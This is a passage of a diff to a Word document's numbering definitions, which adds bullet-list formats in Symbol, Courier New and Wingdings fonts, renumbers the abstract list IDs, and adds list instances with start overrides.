+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="19BA3C23"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EEAC55C"/>
@@ -10134,7 +11130,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B012005"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3F3685C4"/>
@@ -10220,7 +11216,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1B845814"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6090096A"/>
@@ -10306,7 +11302,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C540331"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5CDE07BE"/>
@@ -10419,7 +11415,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="205515BD"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1D1E71C6"/>
@@ -10508,7 +11504,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="20EB0347"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF2483BE"/>
@@ -10621,7 +11617,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28755231"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AEC09966"/>
@@ -10734,7 +11730,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2C533112"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="52DE695A"/>
@@ -10847,7 +11843,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="2C80678E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EF66D31E"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2CB97ECF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3D763EB8"/>
@@ -10960,7 +12069,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2EC916C9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9744997E"/>
@@ -11046,7 +12155,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F756123"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F9A7344"/>
@@ -11132,7 +12241,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="35D56A6F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="13D67F38"/>
@@ -11218,7 +12327,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BBA210B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9392F422"/>
@@ -11331,7 +12440,233 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3C4C7B79"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4F5C0A08"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="40413435"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="30186B74"/>
+    <w:lvl w:ilvl="0" w:tplc="40090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="40090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="40090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42A20738"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="5E1240AE"/>
@@ -11444,7 +12779,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="43EF75BB"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B54C9A6A"/>
@@ -11557,7 +12892,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="466B2C0A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="81CABED2"/>
@@ -11670,7 +13005,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFB7364"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="13FCFC6A"/>
@@ -11783,7 +13118,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5103291A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E564C9B0"/>
@@ -11896,7 +13231,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56746C9B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="93687E9C"/>
@@ -12009,7 +13344,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="58D63FD5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="FB7A028A"/>
@@ -12122,7 +13457,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5AEA7BFF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7DFE11AE"/>
@@ -12235,7 +13570,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64E4550A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C765CC8"/>
@@ -12348,7 +13683,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6DA176D3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BE0E9F7C"/>
@@ -12461,7 +13796,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="782F7235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="65A04688"/>
@@ -12574,7 +13909,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D795EE6"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F3F82F6E"/>
@@ -12688,7 +14023,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="17"/>
+    <w:abstractNumId w:val="22"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -12718,6 +14053,216 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="2">
+    <w:abstractNumId w:val="30"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="29"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="6"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="16"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="12"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
